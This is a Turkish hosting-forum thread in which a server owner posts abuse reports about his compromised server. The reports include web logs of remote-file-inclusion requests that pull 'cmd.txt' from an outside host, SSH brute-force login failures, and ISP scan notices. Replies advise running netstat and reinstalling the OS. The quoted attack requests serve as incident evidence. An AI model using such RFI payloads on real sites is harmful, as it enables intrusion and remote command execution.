Site, Sunucu Sorunlarınız ve Çözümleri » Güvenlik

**nbbh** · #1 (**permalink**) 12.03.08, 04:59 PM

arkdaşlar daha önce de belirtmiştim sunucumdan dışarı saldırı , buyrun gelen mailler ve loglar.;

herkese yardımları içinteşekkürler.

suncu ip miz : 89.149.254.31

Kod:

Mit freundlichen Grüßen / Best regards
Thomas Turnwald
 
Bitte senden Sie den eMail-Verlauf immer mit!
Please resend the eMail-history!
 
netdirekt e. K.
Kleyerstrasse 79  / Tor 13
60326 Frankfurt am Main
Germany
 
Phone: +49 69 9055688-0
Fax: +49 69 9055688-22
 
Registernummer: HRA 30056,
Gericht: Amtsgericht Frankfurt/Main
Inhaber: Wiethold Wagner
 
----- Original Message ----- 
From: "Helmut Hullen" <Hullen@t-online.de>
To: <info@netdirekt.de>
Sent: Tuesday, March 11, 2008 10:37 PM
Subject: seltsame Abfragen
 
 
> Sehr geehrte Damen und Herren,
>
> in den Log-Dateien einer von mir betreuten Webseite fand ich u.a.
>
> 89-149-254-30.internetserviceteam.com - - [08/Mar/2008:19:55:15 +0100] 
> "GET 
> //include/doc/get_image.php?lang=&img=http://mos1.altervista.org/cmd.txt? 
> HTTP/1.1" 403 351 "-" "libwww-perl/5.808"
> 89-149-254-30.internetserviceteam.com - - [08/Mar/2008:19:55:15 +0100] 
> "GET 
>
/stabil//include/doc/get_image.php?lang=&img=http://mos1.altervista.org/cmd.
txt? 
> HTTP/1.1" 403 358 "-" "libwww-perl/5.808"
> 89-149-254-30.internetserviceteam.com - - [08/Mar/2008:19:55:15 +0100] 
> "GET 
>
/stabil/Updates//include/doc/get_image.php?lang=&img=http://mos1.altervista.
org/cmd.txt? 
> HTTP/1.1" 403 366 "-" "libwww-perl/5.808"
> 89-149-254-30.internetserviceteam.com - - [08/Mar/2008:20:03:17 +0100] 
> "GET 
>
/doc//include/doc/get_image.php?lang=&img=http://mos1.altervista.org/cmd.txt
? 
> HTTP/1.1" 403 355 "-" "libwww-perl/5.808"
> 89-149-254-30.internetserviceteam.com - - [08/Mar/2008:20:03:17 +0100] 
> "GET 
>
/doc/ods-v36//include/doc/get_image.php?lang=&img=Sito in costruzione
/cmd.txt? 
> HTTP/1.1" 403 363 "-" "libwww-perl/5.808"
>
> Die Einträge sind typisch für die Versuche eines bösartigen Programms.
> Könnten Sie bitte erforschen, welcher Ihrer Rechner die Anfragen
> abgesetzt hat und ob er von einem Schadprogramm befallen ist? Danke!
>
> Viele Gruesse!
> Helmut Hullen
> Wendenmaschstr. 8
> 38114 Braunschweig
> Tel. 0531-34 11 26
>

-------------------------------------------------------------------------

Kod:

SSH attack
 
NTP sync'd to GMT -5
 
Begin forwarded message:
 
> smtptoaster.midasnetworks.com login failures:
> Mar 10 01:21:24 smtptoaster sshd[69283]: Invalid user mythtv from  
> 89.149.254.31
> Mar 10 01:21:25 smtptoaster sshd[69285]: Invalid user mythtv from  
> 89.149.254.31
> Mar 10 01:21:27 smtptoaster sshd[69287]: Invalid user mythtv from  
> 89.149.254.31
> Mar 10 01:21:28 smtptoaster sshd[69289]: Invalid user mythtv from  
> 89.149.254.31
> Mar 10 01:21:30 smtptoaster sshd[69291]: Invalid user oracle from  
> 89.149.254.31
> Mar 10 01:21:31 smtptoaster sshd[69293]: Invalid user oracle from  
> 89.149.254.31
> Mar 10 01:21:32 smtptoaster sshd[69295]: Invalid user oracle from  
> 89.149.254.31
> Mar 10 01:21:34 smtptoaster sshd[69297]: Invalid user oracle from  
> 89.149.254.31
> Mar 10 01:21:35 smtptoaster sshd[69299]: Invalid user oracle from  
> 89.149.254.31
> Mar 10 01:21:36 smtptoaster sshd[69301]: Invalid user oracle from  
> 89.149.254.31
> Mar 10 01:21:38 smtptoaster sshd[69303]: Invalid user oracle from  
> 89.149.254.31
> Mar 10 01:21:39 smtptoaster sshd[69305]: Invalid user oracle from  
> 89.149.254.31
> Mar 10 01:21:41 smtptoaster sshd[69307]: Invalid user oracle from  
> 89.149.254.31
> Mar 10 01:21:42 smtptoaster sshd[69309]: Invalid user oracle from  
> 89.149.254.31
> Mar 10 01:21:45 smtptoaster sshd[69313]: Invalid user admin from  
> 89.149.254.31
> Mar 10 01:21:46 smtptoaster sshd[69315]: Invalid user admin from  
> 89.149.254.31
> Mar 10 01:21:47 smtptoaster sshd[69317]: Invalid user admin from  
> 89.149.254.31
> Mar 10 01:21:49 smtptoaster sshd[69319]: Invalid user admin from  
> 89.149.254.31
> Mar 10 01:21:50 smtptoaster sshd[69321]: Invalid user admin from  
> 89.149.254.31
> Mar 10 01:21:52 smtptoaster sshd[69323]: Invalid user admin from  
> 89.149.254.31
> Mar 10 01:21:53 smtptoaster sshd[69325]: Invalid user admin from  
> 89.149.254.31
> Mar 10 01:21:54 smtptoaster sshd[69327]: Invalid user admin from  
> 89.149.254.31
> Mar 10 01:21:56 smtptoaster sshd[69329]: Invalid user admin from  
> 89.149.254.31
> Mar 10 01:21:57 smtptoaster sshd[69331]: Invalid user test from  
> 89.149.254.31
> Mar 10 01:21:58 smtptoaster sshd[69333]: Invalid user test from  
> 89.149.254.31
> Mar 10 01:22:00 smtptoaster sshd[69335]: Invalid user test from  
> 89.149.254.31
> Mar 10 01:22:01 smtptoaster sshd[69350]: Invalid user test from  
> 89.149.254.31
> Mar 10 01:22:03 smtptoaster sshd[69352]: Invalid user test from  
> 89.149.254.31
> Mar 10 01:22:04 smtptoaster sshd[69354]: Invalid user test from  
> 89.149.254.31
> Mar 10 01:22:05 smtptoaster sshd[69356]: Invalid user test from  
> 89.149.254.31
> Mar 10 01:22:07 smtptoaster sshd[69358]: Invalid user test from  
> 89.149.254.31
> Mar 10 01:22:08 smtptoaster sshd[69360]: Invalid user test from  
> 89.149.254.31
> Mar 10 01:22:09 smtptoaster sshd[69362]: Invalid user test from  
> 89.149.254.31
> Mar 10 01:22:11 smtptoaster sshd[69364]: Invalid user test from  
> 89.149.254.31
> Mar 10 01:22:12 smtptoaster sshd[69366]: Invalid user test from  
> 89.149.254.31
> Mar 10 01:22:13 smtptoaster sshd[69368]: Invalid user test from  
> 89.149.254.31
> Mar 10 01:22:15 smtptoaster sshd[69370]: Invalid user mysql from  
> 89.149.254.31
> Mar 10 01:22:16 smtptoaster sshd[69372]: Invalid user mysql from  
> 89.149.254.31
> Mar 10 01:22:18 smtptoaster sshd[69374]: Invalid user mysql from  
> 89.149.254.31
> Mar 10 01:22:19 smtptoaster sshd[69376]: Invalid user setup from  
> 89.149.254.31
> Mar 10 01:22:20 smtptoaster sshd[69378]: Invalid user setup from  
> 89.149.254.31
> Mar 10 01:22:22 smtptoaster sshd[69380]: Invalid user setup from  
> 89.149.254.31
> Mar 10 01:22:23 smtptoaster sshd[69382]: Invalid user setup from  
> 89.149.254.31
> Mar 10 01:22:24 smtptoaster sshd[69384]: Invalid user setup from  
> 89.149.254.31
> Mar 10 01:22:26 smtptoaster sshd[69386]: Invalid user user1 from  
> 89.149.254.31
> Mar 10 01:22:27 smtptoaster sshd[69388]: Invalid user user from  
> 89.149.254.31
> Mar 10 01:22:29 smtptoaster sshd[69390]: Invalid user user from  
> 89.149.254.31
> Mar 10 01:22:30 smtptoaster sshd[69392]: Invalid user user from  
> 89.149.254.31
 
 
-- 
Mit freundlichen Grüssen / Best regards
Simon Roehl
netdirekt e.K.
Kleyerstrasse 79 / Tor 13
60326 Frankfurt am Main
Germany
 
Phone: +49 69 9055688-0
Fax: +49 69 9055688-22
Mail: technik@netdirekt.de
 
Registernummer: HRA 30056
Gericht: Amtsgericht Frankfurt am Main
Inhaber: Wiethold Wagner

---------------------------------------------------------------------------------

Kod:

-------- Original-Nachricht --------
Betreff: (b2911274)Network scan from 89.149.254.31 (repeat offender)
Datum: Wed, 12 Mar 2008 10:49:48 +0000 (GMT)
Von: secmbox3@verizonbusiness.com
Antwort an: secmbox3@verizonbusiness.com
An: abuse@netdirekt.de, abuse@unix-server.com, abuse@gblx.net
 
You are receiving this message because you are on the contact list for
89.149.254.31.  This message has been sent to abuse@netdirekt.de,
abuse@unix-server.com,  abuse@gblx.net.  At this time, this message is
for informational use only.
 
We detected a scan of part of the Verizon Business Public IP network
which appears to have originated from the source address 89.149.254.31
(89-149-254-31.internetserviceteam.com).  There have been 1 previous
offenses by this IP.  While dynamic addressing prevents us from being
able to say whether it was the same individual each time, it could be an
indication of a more serious problem.  The scanning began at
approximately 2008-03-11 02:27:42 UTC.  If neither you nor the owner of
this address are aware of this traffic, it is possible that a third
party is either forging the source address or executing an unauthorized
scan from this machine.  If you suspect the scan is being executed by an
unauthorized third party, a trojan, or a virus, please consult
http://www.cert.org/tech_tips/root_compromise.html.
 
This address attempted to scan approximately 1960 addresses on TCP/22.
 
This is a violation of Verizon Business's acceptable use policy.  For
further information, please consult: http://global.mci.com/terms/a_u_p/.
 A reply to this message is not required, but the activity above must be
stopped.  If you need to contact us about this issue, please reply to
this message leaving the ticket number in the subject line.
 
Thank you
 
Verizon Business Infrastructure/Network Security Team
 
Sample of log entries:
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP 152.63.0.78:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP 152.63.0.76:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP 152.63.0.79:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP
152.63.0.220:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP
152.63.0.223:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP
152.63.0.221:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP
152.63.0.209:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP
152.63.0.211:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP
152.63.0.217:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP
152.63.0.208:22,tcp
 
 
-- 
Mit freundlichen Grüssen / Best regards
Simon Roehl
netdirekt e.K.
Kleyerstrasse 79 / Tor 13
60326 Frankfurt am Main
Germany
 
Phone: +49 69 9055688-0
Fax: +49 69 9055688-22
Mail: technik@netdirekt.de
 
Registernummer: HRA 30056
Gericht: Amtsgericht Frankfurt am Main
Inhaber: Wiethold Wagner

-----------------------------------------------------------------------------------

Kod:

-------- Original-Nachricht --------
Betreff: Incident ID: BRT488159 Sent to info@netdirekt.de
Datum: Wed, 12 Mar 2008 08:32:14 UT
Von: soc@brasiltelecom.com.br
An: info@netdirekt.de
CC: cert@cert.br
 
Dear Sirs,
 
   It was detected on Brasil Telecom's monitoring systems that the
 machine listed in this mail has been maliciously used. The traffic
details are
below (Note that the date/time is in the format: YYYY-MM-DD HH:MM:SS).
Please respond accordingly to this Incident.
 
   Therefore the IP 89.149.254.31 will be blocked on all our Data
Centers for 60 minutes.
 
   To reply this e-mail, please keep the ID BRT488159 in the Subject Field.
 
Thanks,
 
CSIRT Brasil Telecom
 
 
2008-03-12 08:23:57 GMT
 
89.149.254.31 1:2002889 SSH Brute Force Attempt
 
 
Prezados responsaveis,
 
   Foi identificado atraves da monitoracao de seguranca da Brasil
Telecom que a maquina listada abaixo esta sendo usada para fins
maliciosos na Internet (Note que a data esta no seguinte formato:
AAAA-MM-DD HH:MM:SS). Favor tomar as acoes cabiveis em relacao ao
Incidente.
 
   Em virtude disso o IP 89.149.254.31 ficara 60 minutos bloqueado em
todos os nossos Data centers.
 
   Ao responder este e-mail mantenha o ID BRT488159 no campo assunto.
 
Att,
 
Brasil Telecom CSIRT
 
---
Esta mensagem foi enviada automaticamente pelo SOC - Centro de Operacoes
de Seguranca da Brasil Telecom S.A. e pode conter informacoes
privilegiadas e/ou de carater confidencial, nao podendo ser
retransmitida. Caso mais esclarecimentos ou acoes por parte da equipe de
Resposta a Incidentes de Seguranca sejam necessarios, favor contactar o
SOC no telefone +55(61)3305-5565 (atendimento 24x7), ou pelo e-mail
soc.nivel1@brasiltelecom.com.br.
 
 
-- 
Mit freundlichen Grüssen / Best regards
Simon Roehl
netdirekt e.K.
Kleyerstrasse 79 / Tor 13
60326 Frankfurt am Main
Germany
 
Phone: +49 69 9055688-0
Fax: +49 69 9055688-22
Mail: technik@netdirekt.de
 
Registernummer: HRA 30056
Gericht: Amtsgericht Frankfurt am Main
Inhaber: Wiethold Wagner

**PowerfuL** · #2 (**permalink**) 12.03.08, 05:17 PM

Edit... yanlış görmüşüm

**Ni-Osman** · #3 (**permalink**) 12.03.08, 07:18 PM

Açılan hesaplar içinde ssh yetkisi olan biri varmı?

Hacklenmiş olmayasınız?

Bu tür saldırıları garip gelecek ama php den yapabiliyorlar

sunucunuzdan

netstat -nap

çıktısı alıp aynen buraya kopyalayın içeriye ve dışarıya gönderilen verileri görelim

**sinangunay** · #4 (**permalink**) 12.03.08, 10:23 PM

Bu işin sonu OS-reload arkadaşım..

**RAMBilisim** · #5 (**permalink**) 12.03.08, 11:43 PM

Alıntı:

sinangunay´isimli üyeden Alıntı

Bu işin sonu OS-reload arkadaşım..

Maalesef, katılıyorum.

**Onur** · #6 (**permalink**) 13.03.08, 06:50 AM

Alıntı:

sinangunay´isimli üyeden Alıntı

Bu işin sonu OS-reload arkadaşım..

Aynen

**CaLViN** · #7 (**permalink**) 13.03.08, 07:02 AM

Sunucu pert diyorum.
Çoğu verimerkezi reload ister.
Ya da saldırı kaynağını nedenleri ile göstermenizi ister.

Seçenekler
Yazdırılabilir şekli göster Sayfayı E-Mail olarak gönder
Stil
Normal Hybrid-Şeklinde gösterime geç Ağaç şeklinde gösterime geç

Benzer Konular
Konu	Konuyu Başlatan	Forum	Cevaplar	Son Mesaj
Cpanel Yardiim LÜtfen Bakin	msercand	cPanel 2082	7	18.02.08 08:54 PM
cpanele giremiyorum..Lütfen acil yardım.	kabatas	cPanel 2082	8	08.12.07 11:04 AM
FTP hack lütfen Yardım edin...	izmir	Soru ve Cevaplar	0	03.11.07 09:33 AM
Zipli dosyayı dışarı çıkarırken varolan dosyanın üstüne yazmasını nasıl sağlarız	Varista	Soru ve Cevaplar	2	08.08.07 03:30 PM
Lütfen yardım reseller server kimden alınmış	cevlik	Soru ve Cevaplar	3	03.08.07 10:45 PM

Site, Sunucu Sorunlarınız ve Çözümleri » Güvenlik

Sucumdan dışarı saldırı varr yardım lütfen :S

WHM cPanel Destek Platformu

Sucumdan dışarı saldırı varr yardım lütfen :S